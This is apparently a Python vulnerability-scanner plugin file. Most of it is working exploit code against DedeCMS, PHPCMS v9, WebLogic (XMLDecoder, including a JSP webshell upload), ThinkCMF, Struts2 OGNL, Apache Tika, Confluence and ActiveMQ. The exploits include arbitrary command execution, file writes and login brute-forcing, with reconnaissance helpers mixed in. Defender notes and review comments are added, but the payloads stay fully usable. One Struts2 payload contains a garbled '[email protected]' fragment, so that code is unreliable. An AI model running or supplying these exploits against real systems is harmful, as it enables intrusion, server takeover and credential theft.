def prove(data):
    '''
    Fairly time-consuming; better run as a standalone script.

    Guesses the renamed DedeCMS admin directory through ``tags.php``: each POST
    carries ``_FILES[...]`` form fields whose ``tmp_name`` embeds a candidate
    path, and a 200 response *without* the text "Upload filetype not allow !"
    is taken as the success signal for that candidate.  Phase 1 brute-forces a
    1..6 character prefix; phase 2 extends it one character at a time.

    Args:
        data: scanner state dict.  Reads ``base_url``; on success sets
            ``data['flag'] = 1`` and appends the discovered path to
            ``data['data']`` and ``data['res']`` (key ``'dede_manage'``).

    Returns:
        ``data``, mutated in place.

    Defender note: the observable pattern is a very large burst of POSTs to
    ``tags.php`` (also under ``dedecms/``) carrying ``_FILES[mochazz]`` fields
    from a single client; phase 1 alone walks permutations of a 39-character
    alphabet, so request volume is the thing to alert on.
    '''
    data = init(data, 'dedecms')
    if data['base_url']:
        characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
        # tmp_name is a format template: "{p}" is filled per candidate and the
        # template is restored after every answered request.
        _data = {
            "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
            "_FILES[mochazz][name]": 0,
            "_FILES[mochazz][size]": 0,
            "_FILES[mochazz][type]": "image/gif"
        }
        # Site root first, then a dedecms/ sub-directory.
        for a in ['', 'dedecms/']:
            url = data['base_url'] + a + 'tags.php'
            back_dir = ""
            flag = 0
            res = curl('get', url)
            if res!=None and res.status_code ==200:
                # Phase 1: permutations of 1..6 characters until one candidate
                # is accepted; flag == 1 ends the outer loop.
                for num in range(1, 7):
                    if flag ==1 :
                        break
                    for pre in itertools.permutations(characters, num):
                        pre = ''.join(list(pre))
                        _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
                        r = curl('post', url, data=_data)
                        # NOTE(review): when curl returns None the template is
                        # not restored, so the next .format() is a no-op and the
                        # already-formatted path is sent again.
                        if r!=None:
                            if "Upload filetype not allow !" not in r.text and r.status_code == 200:
                                flag = 1
                                back_dir = pre
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                                break
                            else:
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                # Phase 2: grow back_dir one character per round, at most 30
                # rounds.  Reaching the alphabet's last character in a round
                # without a hit (that character is never sent) ends the search.
                flag = 0
                x = 0
                for i in range(30):
                    if flag == 1:
                        x = i
                        break
                    for ch in characters:
                        if ch == characters[-1]:
                            flag = 1
                            x = i
                            break
                        _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
                        r = curl('post', url, data=_data)
                        if r != None:
                            if "Upload filetype not allow !" not in r.text and r.status_code == 200:
                                back_dir += ch
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                                break
                            else:
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

                # Reported only when phase 2 stopped before its 30-round cap.
                if x < 29 and flag ==1:
                    data['flag'] = 1
                    data['data'].append({"url": data['base_url'] + a + back_dir})
                    data['res'].append({"info":  data['base_url'] + a + back_dir, "key": 'dede_manage'})
    return data
def prove(data):
    """Check a PHPCMS v9 install for the attachment/download chain that serves an uploaded ``.php`` file.

    Steps (all requests reuse the same desktop User-Agent), tried at the site
    root and under ``phpcms/``:
      1. GET ``m=wap&c=index&a=init&siteid=1`` and read the ``*_siteid`` cookie.
      2. POST that value as ``userid_flash`` to ``swfupload_json`` and read the
         ``*_att_json`` cookie.
      3. GET ``m=content&c=down&a=init&a_k=<att_json>`` and take the first
         ``<a href>`` on the page.
      4. GET that link; ``<?php`` in the response is treated as confirmation.

    Args:
        data: scanner state dict; reads ``base_url``.  On success ``flag`` is set,
            the final URL is appended to ``data['data']`` and the full response
            body is stored in ``data['res']`` under ``'connect'``.

    Returns:
        ``data`` (early return on the first confirmed path).
    """
    data = init(data, 'phpcms')
    if data['base_url']:
        headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4"}
        for path in ["", "phpcms/"]:
            url1 = data['base_url'] + path +"index.php?m=wap&c=index&a=init&siteid=1"
            res1 = curl('get',url1,headers = headers)
            if res1 !=None:
                for cookie in res1.cookies:
                    if '_siteid' in cookie.name:
                        userid = cookie.value

                        url2 = data['base_url'] + path +"index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp"
                        _data1 = {'userid_flash': userid}
                        res2 = curl('post', url=url2, data=_data1,headers = headers)
                        if res2 != None:
                            # Inner loop variable shadows the outer ``cookie``;
                            # harmless because the outer value is not reused.
                            for cookie in res2.cookies:
                                if '_att_json' in cookie.name:
                                    att_json = cookie.value

                                    url3 = data['base_url'] + path +"index.php?m=content&c=down&a=init&a_k=" + att_json
                                    res3 =  curl('get', url3,headers = headers)

                                    if res3 !=None:
                                        # NOTE(review): [0] raises IndexError when no
                                        # anchor matches, and nothing here catches it.
                                        file = re.findall(r'<a href="(.+?)"', res3.text)[0]
                                        url4 =  data['base_url'] + path + 'index.php' + file
                                        res4 = curl('get', url4,headers = headers)
                                        if res4 !=None:
                                            if  '<?php' in res4.text:
                                                data['flag'] = 1
                                                data['data'].append({"url": url4})
                                                data['res'].append({"info": url1, "key": "phpcms v9 download",'connect':res4.text})
                                                return data
    return data
def prove(data):
    """Probe WebLogic's ``wls-wsat/CoordinatorPortType`` for XMLDecoder processing of the SOAP WorkContext header.

    A SOAP envelope whose ``work:WorkContext`` header carries a
    ``java.beans.XMLDecoder`` document is POSTed; the document asks the server to
    write a ``<random 6 digits>.txt`` containing ``xmldecoder_vul_test`` under its
    internal war directory.  The file is then requested over HTTP and a 200 with
    the marker confirms the issue.  Two deployment paths are tried in turn
    (``bea_wls_internal``, then ``wls-wsat``).

    Args:
        data: scanner state dict; reads ``base_url``.

    Returns:
        ``data`` with ``flag``/``data``/``res`` filled in on success.

    Defender note: the request signature is a POST to
    ``/wls-wsat/CoordinatorPortType`` with ``Content-Type: text/xml`` and an
    XMLDecoder document inside the SOAP header; the on-disk artifact is a
    six-digit ``.txt`` under ``servers/AdminServer/tmp/_WL_internal``.
    """
    data = init(data, 'weblogic')
    if data['base_url']:
        headers = {"Content-Type": "text/xml"}
        url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
        ran = str(random.randint(100000, 999999))
        poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
        try:
            # The POST's response is never inspected; ``result`` is overwritten
            # by the GET for the marker file.
            result = curl('post', url, data=poc, headers=headers)
            targeturl = data['base_url'] + "/bea_wls_internal/" + ran + ".txt"
            result = curl('get', targeturl)
            if result and str(
                    result.status_code
            ) == '200' and 'xmldecoder_vul_test' in result.text:
                data['flag'] = 1
                data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
                data['res'].append({"info": url, "key": targeturl})
            else:
                ran = str(random.randint(100000, 999999))
                poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
                result = curl('post', url, data=poc, headers=headers)
                targeturl = data['base_url'] + "/wls-wsat/" + ran + ".txt"
                # NOTE(review): unlike the first branch this GET re-requests
                # ``url`` rather than ``targeturl``, so the marker check below is
                # run against the endpoint's own response.
                result = curl('get', url)
                if result and str(
                        result.status_code
                ) == '200' and 'xmldecoder_vul_test' in result.text:
                    data['flag'] = 1
                    data['data'].append(
                        {"page": '/wls-wsat/CoordinatorPortType'})
                    data['res'].append({"info": targeturl, "key": url})
        except Exception as e:
            # Transport errors are treated as "not confirmed"; nothing is logged.
            pass
    return data
def upload(data=None):
    """Send the module-level ``shellpoc1``/``shellpoc2`` payloads to ``wls-wsat/CoordinatorPortType`` and look for ``ahtest.jsp``.

    Companion of the ``prove`` routine for the same endpoint: instead of a marker
    text file it expects ``ahtest.jsp`` to become reachable under
    ``bea_wls_internal`` (first attempt) or ``wls-wsat`` (second attempt) and to
    answer 200 with ``ahtest`` in the body.  The two payload strings are defined
    elsewhere in the module and are not visible here.

    Args:
        data: scanner state dict (``None`` is accepted and handed to ``init``).

    Returns:
        ``data``; on success ``res`` records the JSP URL together with the
        ``?pwd=ahtest&cmd=whoami`` query the page uses to invoke it.

    Defender note: a file named ``ahtest.jsp`` under either internal war path, or
    requests carrying ``pwd=ahtest``, is the post-exploitation artifact to hunt for.
    """
    data = init(data, 'weblogic')
    if data['base_url']:
        headers = {"Content-Type": "text/xml"}
        url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
        result = curl('post', url, data=shellpoc1, headers=headers)
        targeturl = data['base_url'] + "/bea_wls_internal/ahtest.jsp"
        result = curl('get', targeturl)
        # NOTE(review): no None check before .status_code here or below; if
        # curl() returns None on failure (as the sibling checks assume) this
        # raises AttributeError instead of reporting "not found".
        if str(result.status_code) == '200' and 'ahtest' in result.text:
            data['flag'] = 1
            data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
            data['res'].append({
                "info": url,
                "key": targeturl + "?pwd=ahtest&cmd=whoami"
            })
        else:
            result = curl('post', url, data=shellpoc2, headers=headers)
            targeturl = data['base_url'] + "/wls-wsat/ahtest.jsp"
            result = curl('get', targeturl)
            if str(result.status_code) == '200' and 'ahtest' in result.text:
                data['flag'] = 1
                data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
                data['res'].append({
                    "info": targeturl + "?pwd=ahtest&cmd=whoami",
                    "key": "/wls-wsat/CoordinatorPortType"
                })
    return data
def prove(data):
    """Test ThinkCMF 2.2.3 template injection through the Comment widget's ``fetch`` action.

    ``templateFile`` is pointed at ``/../public/index`` and ``content`` carries a
    ``<php>`` tag that writes ``bytestforme1.php`` (a ``phpinfo()`` stub) to the
    web root; the stub is then fetched and ``php.ini`` in its output confirms
    that the template was executed.

    Args:
        data: scanner state dict; reads ``base_url``.

    Returns:
        ``data`` with ``flag``/``data``/``res`` set on success.

    Defender note: the artifact left behind is ``bytestforme1.php`` at the web
    root; the request signature is a POST to ``index.php?g=Comment&m=Widget&a=fetch``
    whose ``content`` field contains ``<php>``.
    """
    # NOTE(review): init()'s return value is discarded here, whereas every other
    # check on this page rebinds ``data = init(...)``.
    init(data,'thinkcmf')
    if data['base_url']:
        url = data[
                  'base_url'] + "index.php?g=Comment&m=Widget&a=fetch"
        _data = "templateFile=/../public/index&prefix=''&content=<php>file_put_contents('bytestforme1.php','<?php phpinfo();')</php>"
        res = curl('post', url,data = _data)
        if res != None and res.status_code == 200:
            res = curl('get', data['base_url'] + "/bytestforme1.php")
            if res != None and res.status_code == 200 and 'php.ini' in res.text:
                data['flag'] = 1
                data['data'].append({"flag": url})
                data['res'].append({"info": url, "key": "thinkcmf 2.2.3 template inject"})
    return data
def upload(data):
    """Write a file on a Struts2 host via an OGNL expression in a url-encoded ``redirect:`` action prefix.

    The expression echoes ``oko`` / ``kok/`` and the context path, then copies the
    ``shell`` request parameter (the contents of ``data['srcpath']``) into the
    path given by ``data['despath']``.

    Args:
        data: scanner state dict; ``url``, ``srcpath`` and ``despath`` are read.

    Returns:
        ``data``.  ``flag`` is set as soon as the request has been sent — the
        response is never inspected, so success is assumed rather than verified.

    Defender note: the request signature is a ``redirect:`` action prefix whose
    value starts with a url-encoded ``${`` (``%24%7b``); the written file at
    ``despath`` is the artifact.
    """
    data = init(data, 'struts')
    if data['url'] != None:
        despath = data['despath']
        content = _read_file(data['srcpath'])
        prove_poc = "redirect%3a%24%7b%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27)%2c%23res%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2c%23res.getWriter().print(%22oko%22)%2c%23res.getWriter().print(%22kok%2f%22)%2c%23res.getWriter().print(%23req.getContextPath())%2c%23res.getWriter().flush()%2c%23res.getWriter().close()%2cnew+java.io.BufferedWriter(new+java.io.FileWriter(%22%PATH%%22)).append(%23req.getParameter(%22shell%22)).close()%7d&shell=%FILECONTENT%".replace("%PATH%", despath).replace("%FILECONTENT%", content)
        try:
            headers = {"Content-Type": "application/x-www-form-urlencoded"}
            # Body is sent with a GET; the response is discarded.
            curl('get', data['url'], data=prove_poc, headers=headers)
            data['flag'] = 1
            # The whole payload, file contents included, is kept in data['data'].
            data['data'].append({"poc": prove_poc})
            data['res'].append({"info": data['despath'],"key":"upload"})
        except:
            # Bare except: any failure (including a missing srcpath) is silent.
            pass
    return data
def prove(data):
    """Fingerprint a WAF in front of ``data['url']`` using the module-level ``_dna`` signature list.

    ``_dna`` holds one ``name|location|key|regex`` line per signature.  ``location``
    is ``headers`` (regex against the response headers, and ``key`` must also be
    present in them) or ``index`` (regex against the body).  The first matching
    signature wins.

    Args:
        data: scanner state dict; reads ``url``.

    Returns:
        ``data``; on a match ``flag`` is set and
        ``{"info": <waf name>, "key": "waf"}`` is appended to ``res``.
    """
    data = init(data, 'web')
    if data['url']:
        try:
            waf = None
            res = curl('get', data['url'])
            header = res.headers
            html = res.text
            mark_list = []
            marks = _dna.strip().splitlines()
            for mark in marks:
                name, location, key, value = mark.strip().split("|", 3)
                mark_list.append([name, location, key, value])

            for mark_info in mark_list:
                name, location, key, reg = mark_info
                if location == "headers":
                    # NOTE(review): re.search() needs a string.  If res.headers is
                    # a mapping (as with requests) this raises TypeError, which
                    # the bare except below turns into "no WAF detected".
                    if re.search(reg, header, re.I) and key in header:
                        waf = name
                        break
                if location == "index":
                    if re.search(reg, html, re.I):
                        waf = name
                        break
            # Non-raw pattern: '\/' is an invalid escape sequence (DeprecationWarning).
            # The title is only printed for the operator; it is not stored in data.
            m = re.search('<title>(.*)?<\/title>', html)
            if m:
                print(m.group(1), 'title')
            if waf != None:
                data['flag'] = 1
                data['res'].append({"info": waf, "key": "waf"})
        except:
            # Bare except: malformed _dna lines and transport errors are silent.
            pass
    return data
def prove(data):
    """Check Confluence's ``rest/tinymce/1/macro/preview`` for template path traversal via the widget macro.

    The ``_template`` parameter of a ``widget`` macro preview is set to
    ``../web.xml``; a 200 whose body contains ``</web-app>`` shows that the server
    rendered that file.  Only the first ``limitSize`` characters of the matched
    ``<web-app>...</web-app>`` block are stored as evidence.

    Args:
        data: scanner state dict; reads ``base_url``.

    Returns:
        ``data``.

    Defender note: a POST to ``/rest/tinymce/1/macro/preview`` whose JSON
    ``_template`` value contains ``..`` is the request to alert on.
    """
    data = init(data, 'confluence')
    if data['base_url']:
        filename = "../web.xml"
        # Cap on how much of the rendered file is kept in data['data'].
        limitSize = 100

        payload = data['base_url'] + "rest/tinymce/1/macro/preview"
        headers = {
            "User-Agent":
            "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
            "Referer": data['base_url'] +
            "pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
            "Content-Type": "application/json; charset=utf-8"
        }
        _data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
        try:
            r = curl('post', payload, data=_data, headers=headers)
            # r is used without a None check; a failed request ends in the bare except.
            if r.status_code == 200 and "</web-app>" in r.text:
                # Non-raw pattern: '\s', '\S' and '\/' are written as plain escapes.
                m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
                if m:
                    content = m.group()[:limitSize]
                    data['flag'] = 1
                    data['data'].append({"content": content})
                    data['res'].append({"info": payload, "key": filename})

        except:
            pass

    return data
def exec(data):
    """Send ``data['cmd']`` to an Apache Tika server through the OCR-path header handling of ``PUT /meta``.

    The request headers point ``X-Tika-OCRTesseractPath`` at ``cscript`` and
    ``X-Tika-OCRLanguage`` at a ``//E:`` engine switch, and the body is a JScript
    snippet that runs ``cmd /c <cmd>`` — so the technique only applies to Windows
    hosts.  The response markers ``X-Parsed-By`` and ``tika.parse`` only show that
    Tika processed the body; the command's output is not captured.

    Args:
        data: scanner state dict; reads ``base_url`` and ``cmd``.

    Returns:
        ``data``; on a marker match ``res['info']`` holds the whole response text.

    Defender note: a PUT to ``/meta`` whose ``X-Tika-OCRTesseractPath`` /
    ``X-Tika-OCRLanguage`` values are not a tesseract path and language code is
    the request signature.  (The function name shadows the builtin ``exec``;
    presumably the framework looks it up by name.)
    """
    # NOTE(review): init()'s return value is discarded here, unlike the other checks.
    init(data, 'apache')
    if data['base_url']:
        headers = {
            "X-Tika-OCRTesseractPath": "\"cscript\"",
            "X-Tika-OCRLanguage": "//E:Jscript",
            "Expect": "100-continue",
            "Content-type": "image/jp2",
            "Connection": "close"
        }

        url = data['base_url'] + "meta"
        jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
         var oExec = oShell.Exec('cmd /c {}');
         '''.format(data['cmd'])
        try:
            res = curl('put', url, headers=headers, data=jscript)
            if res != None and "X-Parsed-By" in res.text and "tika.parse" in res.text:
                data['flag'] = 1
                data['data'].append({"flag": url})
                data['res'].append({
                    "info": res.text,
                    "key": "Apache Tika-server RCE"
                })
        except:
            # Bare except: transport errors are silent.
            pass
    return data
def exec(data=None):
    """Run ``data['cmd']`` on a Struts2 host via an OGNL expression carried in a multipart file field.

    The expression selects ``cmd.exe /c`` or ``/bin/bash -c`` by OS name and
    copies the process output into the HTTP response.  The request is sent with
    ``stream=True`` and the reply is meant to be collected line by line into
    ``res``.

    Args:
        data: scanner state dict; ``url`` and ``cmd`` are read.

    Returns:
        ``data``; ``res['info']`` is intended to hold the command output and
        ``key`` the command itself.  ``flag`` is set whenever the request was sent,
        regardless of what came back.

    Defender note: a multipart upload whose field value begins with ``%{`` is the
    request signature.  (The function name shadows the builtin ``exec``.)
    """
    data = init(data, 'struts')
    if data['url'] != None:

        cmd = data['cmd']
        exec_poc = '''%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='%COMMAND%').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b'''
        headers = {}
        try:
            files = {
                "test": (exec_poc.replace("%COMMAND%", cmd), "text/plain")
            }
            # NOTE(review): ``.text`` already reads the whole body, so ``r`` is a
            # str here, not a response object.
            r = curl('post',
                     data['url'],
                     headers=headers,
                     files=files,
                     stream=True).text
            res = ""
            try:
                # str has no iter_lines(); the AttributeError is caught just
                # below and ``res`` stays "".
                for line in r.iter_lines():
                    res += str(line) + '\r\n'
            except:
                res = str(res)
            data['flag'] = 1
            data['data'].append({"poc": exec_poc})
            data['res'].append({"info": res, "key": cmd})
        except:
            pass
    return data
def _ICPbybeianbeian(domain, dic):
    """Look up the ICP registration record for *domain* on beianbeian.com.

    Up to three attempts are made; any exception during fetch or parse is
    swallowed and the next attempt starts.  On a completed attempt
    ``dic['flag']`` and ``dic['beianbeian_icp']`` are set to True, and a
    ``domain:<link text>:<pass_time text>`` string is appended to
    ``dic['ICP']`` when both fragments were found and the entry is new.

    Returns:
        ``(dic, added)`` — *added* is True only when a new entry was appended.
        After three failed attempts the error is logged and ``(dic, False)``
        is returned.
    """
    added = False
    for _attempt in range(3):
        added = False
        try:
            query_url = "http://www.beianbeian.com/search/" + domain.strip(' ')
            page = curl('get', query_url)
            soup = BeautifulSoup(page.text, "html5lib")
            link_text = pass_time = None
            anchors = soup.find_all('a', href=re.compile('/beianxinxi/'))
            if anchors:
                link_text = anchors[0].get_text()
                pass_time = soup.find(id="pass_time").get_text()
            record = domain
            if link_text is not None and pass_time is not None:
                record = ":".join([domain, link_text, pass_time])
            if record != domain and record not in dic['ICP']:
                dic['ICP'].append(record)
                added = True
            dic['flag'] = True
            dic['beianbeian_icp'] = True
            return dic, added
        except:
            pass
    logger.debug("Error for ICP(%s)%s by beianbeian" % (dic['id'], domain))
    return dic, added
def upload(data=None):
    """Write ``data['srcpath']``'s contents to ``data['despath']`` on a Struts2 host through the ``debug=command`` OGNL parameter.

    Same OGNL body as the ``redirect:`` variant on this page, but sent as query
    parameters (``params=``) rather than as a request body; the ``shell``
    parameter carries the file content.

    Args:
        data: scanner state dict; ``url``, ``srcpath`` and ``despath`` are read.

    Returns:
        ``data``; ``flag`` is set once the request was sent, without checking the
        response.

    Defender note: ``debug=command&expression=`` in a query string is the request
    signature — the debugging interceptor should not be reachable in production.
    """
    data = init(data, 'struts')
    if data['url'] != None:
        upload_poc = '''debug=command&expression=#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.getWriter().print("oko"),#res.getWriter().print("kok/"),#res.getWriter().print(#req.getContextPath()),#res.getWriter().flush(),#res.getWriter().close(),new java.io.BufferedWriter(new java.io.FileWriter(%PATH%)).append(#req.getParameter("shell")).close()&shell=%FILECONTENT%'''
        despath = data['despath']
        content = _read_file(data['srcpath'])
        headers = {}
        try:
            headers["Content-Type"] = "application/x-www-form-urlencoded"
            # Response is discarded; only the unsubstituted template is stored below.
            curl('get', data['url'],params=upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content),headers=headers)
            data['flag'] = 1
            data['data'].append({"poc": upload_poc})
            data['res'].append({"info":  data['despath'],"key":"upload"})
        except:
            # Bare except: any failure is silent.
            pass
    return data
def prove(data):
    """Try dictionary username/password pairs against the ActiveMQ web console (``admin/``) with HTTP Basic auth.

    Dictionary paths default to ``dict/activemq_usernames.txt`` and
    ``dict/activemq_passwords.txt`` unless ``data['d1']`` / ``data['d2']`` override
    them.  A password containing ``%user%`` has it replaced by the current
    username.  A response containing ``Console`` sets ``flag``.

    Args:
        data: scanner state dict; ``base_url`` and ``headers`` are read, and
            ``data['headers']['Authorization']`` is overwritten for every attempt.

    Returns:
        ``data``.

    Defender note: the observable pattern is a burst of Basic-auth GETs to
    ``/admin/`` with varying credentials from one source; lockout or rate limiting
    on the console is the mitigation.
    """
    data = init(data, 'activemq')
    if data['base_url']:
        usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
        ) else _read_dic('dict/activemq_usernames.txt')
        passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
        ) else _read_dic('dict/activemq_passwords.txt')
        url = data['base_url'] + "admin/"
        for linef1 in usernamedic:
            username = linef1.strip('\r').strip('\n')
            for linef2 in passworddic:
                try:
                    password = (linef2 if '%user%' not in linef2
                                else str(linef2).replace(
                                    "%user%",
                                    str(username))).strip('\r').strip('\n')
                    # NOTE(review): b64encode() takes bytes on Python 3 — compare
                    # the rabbitmq check on this page, which encodes first.  A
                    # TypeError here lands in the except below.
                    key = b64encode(":".join([username, password]))
                    data['headers']["Authorization"] = 'Basic %s' % key
                    res = curl('get', url)
                    if 'Console' in res.text:
                        data['flag'] = 1
                    # These appends sit outside the 'Console' check, so every
                    # attempted pair is recorded, not only a successful one.
                    data['data'].append({
                        "username": username,
                        "password": password
                    })
                    data['res'].append({
                        "info": username + "/" + password,
                        "key": "Authorization: " + key
                    })
                except Exception:
                    pass
    return data
def _ICPsobeian(domain, dic):
    """Look up the ICP registration record for *domain* on sobeian.com.

    Up to three attempts are made; any exception aborts the attempt silently
    and the next one starts.  On a completed attempt ``dic['flag']`` and
    ``dic['sobeian_icp']`` are set to True; when a result row lists *domain*,
    a ``domain:<link text>:<yyyy-mm-dd or "None">`` string is appended to
    ``dic['ICP']`` (no de-duplication) and the scan stops at that row.

    Returns:
        ``(dic, added)`` — *added* is True only when an entry was appended.
        After three failed attempts the error is logged and ``(dic, False)``
        is returned.
    """
    added = False
    for _attempt in range(3):
        added = False
        try:
            record = domain
            date_text = "None"
            query_url = "http://www.sobeian.com/search?key=" + domain.strip(' ') + "/"
            page = curl('get', query_url)
            soup = BeautifulSoup(page.text, "html5lib")
            for row in soup.find_all("span", class_="list-group-item clearfix"):
                links = row.find_all('a', href=re.compile('/icp/details/'))
                if domain not in links[2].get_text().split(' '):
                    continue
                record += ":" + links[1].get_text()
                found = re.search(r'\d{4}\-\d{2}\-\d{2}', row.get_text())
                if found is not None:
                    date_text = found.group()
                record += ":" + date_text
                dic['ICP'].append(record)
                added = True
                break
            dic['flag'] = True
            dic['sobeian_icp'] = True
            return dic, added
        except:
            pass
    logger.debug("Error for ICP(%s)%s by sobeian" % (dic['id'], domain))
    return dic, added
def _ICPbyaizhan(domain, dic):
    """Look up the ICP registration record for *domain* on icp.aizhan.com.

    Up to three attempts are made; any exception aborts the attempt silently
    and the next one starts.  On a completed attempt ``dic['flag']`` and
    ``dic['aizhan_icp']`` are set to True, and ``domain`` joined with the text
    of every ``<span>`` inside ``#icp-table`` (``:``-separated) is appended to
    ``dic['ICP']`` when at least one span was found and the entry is new.

    Returns:
        ``(dic, added)`` — *added* is True only when a new entry was appended.
        After three failed attempts the error is logged and ``(dic, False)``
        is returned.
    """
    added = False
    for _attempt in range(3):
        added = False
        try:
            query_url = "https://icp.aizhan.com/" + domain.strip(' ') + "/"
            page = curl('get', query_url)
            soup = BeautifulSoup(page.text, "html5lib")
            table = soup.find(id="icp-table")
            pieces = [domain]
            if table is not None:
                pieces.extend(
                    text
                    for text in (cell.get_text() for cell in table.find_all('span'))
                    if text is not None
                )
            record = ":".join(pieces)
            if record != domain and record not in dic['ICP']:
                dic['ICP'].append(record)
                added = True
            dic['flag'] = True
            dic['aizhan_icp'] = True
            return dic, added
        except:
            pass
    logger.debug("Error for ICP(%s)%s by aizhan" % (dic['id'], domain))
    return dic, added
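def prove(data, *, max_attempts=20, retry_delay=0.3):
    """Resolve ``data['target_host']`` and annotate it with ip.taobao.com region/ISP/city info.

    The resolved address is always reported (``data['flag']`` is set to 1 as soon
    as resolution succeeds); region / ISP / city are appended only when the
    lookup service answers 200 with ``code != 1`` and the field is non-empty.

    Args:
        data: scanner state dict; ``target_host`` is read, ``flag`` is set and one
            ``{"info": ..., "key": 'IP Information'}`` entry is appended to
            ``data['res']``.
        max_attempts: upper bound on lookup requests, so an unreachable or
            permanently failing service cannot stall the scan (the previous
            version looped without limit on 502s and on exceptions).
        retry_delay: seconds slept after an HTTP 502 before retrying.

    Returns:
        ``data`` (also mutated in place).  Hosts that fail to resolve, or a
        missing ``target_host`` key, return it untouched.
    """
    try:
        address = socket.gethostbyname(data['target_host'])
    except (KeyError, OSError):
        # socket.gaierror is an OSError subclass; nothing to report either way.
        return data

    info = address
    data['flag'] = 1
    url = "http://ip.taobao.com/service/getIpInfo.php?ip=%s" % address

    for _ in range(max_attempts):
        try:
            res = curl('get', url)
            if res.status_code == 200:
                payload = json.loads(res.text)
                # code == 1 is the service's "no data" answer; enrich only on success.
                if payload['code'] != 1:
                    fields = payload['data']
                    for label, field in (("Region", 'region'), ("ISP", 'isp'), ("City", 'city')):
                        if fields[field]:
                            info += " | %s: %s" % (label, fields[field])
                break
            if res.status_code == 502:
                time.sleep(retry_delay)
                continue
            break
        except Exception:
            # Best-effort enrichment: a transport or parse error costs one attempt.
            continue

    data['res'].append({"info": info, "key": 'IP Information'})
    return data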
def _by114best(target, dic):
    """Collect domain names hosted on *target* from 114best.com's reverse-IP page.

    Up to three attempts are made; every exception is swallowed and the attempt
    repeated.  Each ``<span>`` under ``#rl`` yields one name (spaces and line
    breaks removed) that is appended to ``dic['domain']`` if not already there.
    On success ``dic['114best_domain']`` and ``dic['flag']`` are set to True.

    Returns:
        ``dic`` (mutated in place) whether or not the lookup succeeded; after
        three failures the error is logged.
    """
    strip_ws = str.maketrans('', '', ' \r\n')
    for _attempt in range(3):
        try:
            # NOTE(review): this header is built (consuming four random draws)
            # but never passed to curl(); kept so behaviour is unchanged.
            spoof_headers = {
                'X-Forwarded-For': "%d.%d.%d.%d" % tuple(
                    random.randint(0, 255) for _ in range(4)
                ),
            }
            query_url = "http://www.114best.com/ip/114.aspx?w=" + target.strip(' ')
            page = curl('get', query_url)
            soup = BeautifulSoup(page.text, "html5lib")
            listing = soup.find(id="rl")
            for cell in listing.find_all('span'):
                name = cell.get_text().translate(strip_ws)
                if name not in dic['domain']:
                    dic['domain'].append(name)
            dic['114best_domain'] = True
            dic['flag'] = True
            return dic
        except:
            pass
    logger.debug("Error for (%s)%s by 114best" % (dic['id'], target))
    return dic
def prove(data):
